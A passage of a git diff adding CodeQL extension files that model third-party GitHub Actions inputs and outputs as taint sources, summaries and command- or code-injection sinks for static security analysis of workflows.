["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml b/actions/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml new file mode 100644 index 000000000000..28dd99378bf5 --- /dev/null +++ b/actions/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] + - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml b/actions/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml new file mode 100644 index 000000000000..7ca3034593bf --- /dev/null +++ b/actions/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/nanasess_setup-php.model.yml b/actions/ql/lib/ext/manual/nanasess_setup-php.model.yml new file mode 100644 index 000000000000..8af1107d6864 --- /dev/null +++ b/actions/ql/lib/ext/manual/nanasess_setup-php.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/nick-fields_retry.model.yml b/actions/ql/lib/ext/manual/nick-fields_retry.model.yml new file mode 100644 index 000000000000..86c0bb7ccfb9 --- /dev/null +++ b/actions/ql/lib/ext/manual/nick-fields_retry.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] + - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"] + - ["nick-fields/retry", "*", "input.command", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/octokit_graphql-action.model.yml b/actions/ql/lib/ext/manual/octokit_graphql-action.model.yml new file mode 100644 index 000000000000..df140b9e570a --- /dev/null +++ b/actions/ql/lib/ext/manual/octokit_graphql-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/actions/ql/lib/ext/manual/octokit_request-action.model.yml b/actions/ql/lib/ext/manual/octokit_request-action.model.yml new file mode 100644 index 000000000000..f0f684aa4caa --- /dev/null +++ b/actions/ql/lib/ext/manual/octokit_request-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/actions/ql/lib/ext/manual/olafurpg_setup-scala.model.yml b/actions/ql/lib/ext/manual/olafurpg_setup-scala.model.yml new file mode 100644 index 000000000000..8149f79fa641 --- /dev/null +++ b/actions/ql/lib/ext/manual/olafurpg_setup-scala.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml b/actions/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml new file mode 100644 index 000000000000..4f2b95eac61e --- /dev/null +++ b/actions/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/actions/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml new file mode 100644 index 000000000000..8abafc6ae7d0 --- /dev/null +++ b/actions/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["paulschuberth/regex-extract-action", "*", "input.haystack", "output.matches", "taint", "manual"] + diff --git a/actions/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml b/actions/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml new file mode 100644 index 000000000000..f0dcfa3ea4ef --- /dev/null +++ b/actions/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml b/actions/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml new file mode 100644 index 000000000000..2268d00d332a --- /dev/null +++ b/actions/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/actions/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/actions/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml new file mode 100644 index 000000000000..ab55b9b62144 --- /dev/null +++ b/actions/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["peter-murray/issue-forms-body-parser", "*", "output.payload", "text", "manual"] diff --git a/actions/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml b/actions/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml new file mode 100644 index 000000000000..1ec53228c169 --- /dev/null +++ b/actions/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] + - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"] + - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/actions/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml new file mode 100644 index 000000000000..97564731d2cd --- /dev/null +++ b/actions/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["potiuk/get-workflow-origin", "*", "output.sourceHeadBranch", "branch", "manual"] diff --git a/actions/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml b/actions/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml new file mode 100644 index 000000000000..b43c13276573 --- /dev/null +++ b/actions/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] + - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/py-actions_flake8.model.yml b/actions/ql/lib/ext/manual/py-actions_flake8.model.yml new file mode 100644 index 000000000000..d9edf347c335 --- /dev/null +++ b/actions/ql/lib/ext/manual/py-actions_flake8.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.path", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.ignore", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.exclude", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.max-line-length", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.args", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml b/actions/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml new file mode 100644 index 000000000000..ce637b1b0c52 --- /dev/null +++ b/actions/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/pyo3_maturin-action.model.yml b/actions/ql/lib/ext/manual/pyo3_maturin-action.model.yml new file mode 100644 index 000000000000..95d63525c575 --- /dev/null +++ b/actions/ql/lib/ext/manual/pyo3_maturin-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] + - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"] + - ["pyo3/maturin-action", "*", "input.command", "command-injection", "manual"] + - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml b/actions/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml new file mode 100644 index 000000000000..d89f4582f67b --- /dev/null +++ b/actions/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml @@ -0,0 +1,24 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/read-file-actions.model.yml b/actions/ql/lib/ext/manual/read-file-actions.model.yml new file mode 100644 index 000000000000..27130231df9c --- /dev/null +++ b/actions/ql/lib/ext/manual/read-file-actions.model.yml @@ -0,0 +1,37 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["juliangruber/read-file-action", "*", "artifact", "output.content", "taint", "manual"] + - ["bfren/read-file", "*", "artifact", "output.contents", "taint", "manual"] + - ["igorskyflyer/action-readfile", "*", "artifact", "output.content", "taint", "manual"] + - ["komorebitech/read-files-action", "*", "artifact", "output.content", "taint", "manual"] + - ["jaywcjlove/github-action-read-file", "*", "artifact", "output.content", "taint", "manual"] + - ["andstor/file-reader-action", "*", "artifact", "output.contents", "taint", "manual"] + - ["Reedyuk/read-properties", "*", "artifact", "output.value", "taint", "manual"] + - ["browniebroke/read-nvmrc-action", "*", "artifact", "output.node_version", "taint", "manual"] + - ["jbutcher5/read-yaml", "*", "artifact", "output.data", "taint", "manual"] + - ["christian-draeger/read-properties", "*", "artifact", "output.*", "taint", "manual"] + - ["traversals-analytics-and-intelligence/file-reader-action", "*", "artifact", "output.content", "taint", "manual"] + - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["satya-500/read-file-github-action", "*", "artifact", "output.contents", "taint", "manual"] + - ["guibranco/github-file-reader-action-v2", "*", "artifact", "output.contents", "taint", "manual"] + - ["gagle/package-version", "*", "artifact", "output.version", "taint", "manual"] + - ["ActionsTools/read-json-action", "*", "artifact", "output.*", "taint", "manual"] + - ["madhead/read-java-properties", "*", "artifact", "output.*", "taint", "manual"] + - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["rexdefuror/read-package-json", "*", "artifact", "env.*", "taint", "manual"] + - ["BrycensRanch/read-properties-action", "*", "artifact", "output.*", "taint", "manual"] + - ["kurt-code/gha-properties", "*", "artifact", "output.*", "taint", "manual"] + - ["SebRollen/toml-action", "*", "artifact", "output.value", "taint", "manual"] + - ["simonblund/version-reader", "*", "artifact", "output.version", "taint", "manual"] + - ["mindsers/changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] + - ["nichmor/minimal-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["miraai/read-helm-chart-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["dangdennis/toml-action", "*", "artifact", "output.value", "taint", "manual"] + - ["artlaman/conventional-changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] + - ["romanlamsal/dotenv-concat", "*", "artifact", "output.*", "taint", "manual"] + - ["sammcj/dotenv-output-action", "*", "artifact", "output.*", "taint", "manual"] + - ["c-py/action-dotenv-to-setenv", "*", "artifact", "output.*", "taint", "manual"] + - ["duskmoon314/action-load-env", "*", "artifact", "output.*", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml b/actions/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml new file mode 100644 index 000000000000..9157cec03dd0 --- /dev/null +++ b/actions/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] + diff --git a/actions/ql/lib/ext/manual/reggionick_s3-deploy.model.yml b/actions/ql/lib/ext/manual/reggionick_s3-deploy.model.yml new file mode 100644 index 000000000000..359c3b0e2225 --- /dev/null +++ b/actions/ql/lib/ext/manual/reggionick_s3-deploy.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.cache", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/release-kit_regex.model.yml b/actions/ql/lib/ext/manual/release-kit_regex.model.yml new file mode 100644 index 000000000000..8534ccc599a3 --- /dev/null +++ b/actions/ql/lib/ext/manual/release-kit_regex.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["release-kit/regex", "*", "input.string", "output.*", "taint", "manual"] + diff --git a/actions/ql/lib/ext/manual/renovatebot_github-action.model.yml b/actions/ql/lib/ext/manual/renovatebot_github-action.model.yml new file mode 100644 index 000000000000..136e4aa9e418 --- /dev/null +++ b/actions/ql/lib/ext/manual/renovatebot_github-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.docker-user", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/actions/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml new file mode 100644 index 000000000000..428115a7bd71 --- /dev/null +++ b/actions/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/Rishabh510/Path-lister-action + - ["Rishabh510/Path-lister-action", "*", "output.paths", "filename", "manual"] + + diff --git a/actions/ql/lib/ext/manual/roots_issue-closer-action.model.yml b/actions/ql/lib/ext/manual/roots_issue-closer-action.model.yml new file mode 100644 index 000000000000..be313c017115 --- /dev/null +++ b/actions/ql/lib/ext/manual/roots_issue-closer-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] + - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml b/actions/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml new file mode 100644 index 000000000000..74e55a9bf4e2 --- /dev/null +++ b/actions/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/ruby_setup-ruby.model.yml b/actions/ql/lib/ext/manual/ruby_setup-ruby.model.yml new file mode 100644 index 000000000000..785616390b39 --- /dev/null +++ b/actions/ql/lib/ext/manual/ruby_setup-ruby.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml b/actions/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml new file mode 100644 index 000000000000..06de2990adf6 --- /dev/null +++ b/actions/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/sergeysova_jq-action.model.yml b/actions/ql/lib/ext/manual/sergeysova_jq-action.model.yml new file mode 100644 index 000000000000..a2ca3eae7844 --- /dev/null +++ b/actions/ql/lib/ext/manual/sergeysova_jq-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] + diff --git a/actions/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml b/actions/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml new file mode 100644 index 000000000000..962c7431b758 --- /dev/null +++ b/actions/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml b/actions/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml new file mode 100644 index 000000000000..ebe62b37a6fd --- /dev/null +++ b/actions/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml b/actions/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml new file mode 100644 index 000000000000..64d8ec1b7a58 --- /dev/null +++ b/actions/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/snow-actions_eclint.model.yml b/actions/ql/lib/ext/manual/snow-actions_eclint.model.yml new file mode 100644 index 000000000000..49ba12d47a24 --- /dev/null +++ b/actions/ql/lib/ext/manual/snow-actions_eclint.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml b/actions/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml new file mode 100644 index 000000000000..396c480c4cdc --- /dev/null +++ b/actions/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection", "manual"] + - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/step-security_harden-runner.model.yml b/actions/ql/lib/ext/manual/step-security_harden-runner.model.yml new file mode 100644 index 000000000000..129c8beb0202 --- /dev/null +++ b/actions/ql/lib/ext/manual/step-security_harden-runner.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml b/actions/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml new file mode 100644 index 000000000000..343c0efe42aa --- /dev/null +++ b/actions/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/actions/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml new file mode 100644 index 000000000000..6ca3eb0c1607 --- /dev/null +++ b/actions/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/the-coding-turtle/ga-file-list + - ["the-coding-turtle/ga-file-list", "*", "output.files", "filename", "manual"] + - ["the-coding-turtle/ga-file-list", "*", "output.file_names", "filename", "manual"] diff --git a/actions/ql/lib/ext/manual/tibdex_backport.model.yml b/actions/ql/lib/ext/manual/tibdex_backport.model.yml new file mode 100644 index 000000000000..956c9afc8e40 --- /dev/null +++ b/actions/ql/lib/ext/manual/tibdex_backport.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] + - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"] + - ["tibdex/backport", "*", "input.labels_template", "code-injection", "manual"] + - ["tibdex/backport", "*", "input.title_template", "code-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/actions/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml new file mode 100644 index 000000000000..e49643d1f155 --- /dev/null +++ b/actions/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["tim-actions/get-pr-commits", "*", "output.commits", "text", "manual"] + diff --git a/actions/ql/lib/ext/manual/timheuer_base64-to-file.model.yml b/actions/ql/lib/ext/manual/timheuer_base64-to-file.model.yml new file mode 100644 index 000000000000..c9b65a303798 --- /dev/null +++ b/actions/ql/lib/ext/manual/timheuer_base64-to-file.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/actions/ql/lib/ext/manual/tj-actions_branch-names.model.yml new file mode 100644 index 000000000000..386142a2d128 --- /dev/null +++ b/actions/ql/lib/ext/manual/tj-actions_branch-names.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/tj-actions/branch-names + - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "branch", "manual"] diff --git a/actions/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/actions/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml new file mode 100644 index 000000000000..3cfedbdec2c8 --- /dev/null +++ b/actions/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultString", "taint", "manual"] + - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultArray", "taint", "manual"] + diff --git a/actions/ql/lib/ext/manual/trilom_file-changes-action.model.yml b/actions/ql/lib/ext/manual/trilom_file-changes-action.model.yml new file mode 100644 index 000000000000..9d5b8b88ce2f --- /dev/null +++ b/actions/ql/lib/ext/manual/trilom_file-changes-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] + - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"] + - ["trilom/file-changes-action", "*", "output.files_modified", "filename", "manual"] + - ["trilom/file-changes-action", "*", "output.files_removed", "filename", "manual"] diff --git a/actions/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml b/actions/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml new file mode 100644 index 000000000000..3893986830a0 --- /dev/null +++ b/actions/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml b/actions/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml new file mode 100644 index 000000000000..f2f99cc744a0 --- /dev/null +++ b/actions/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - 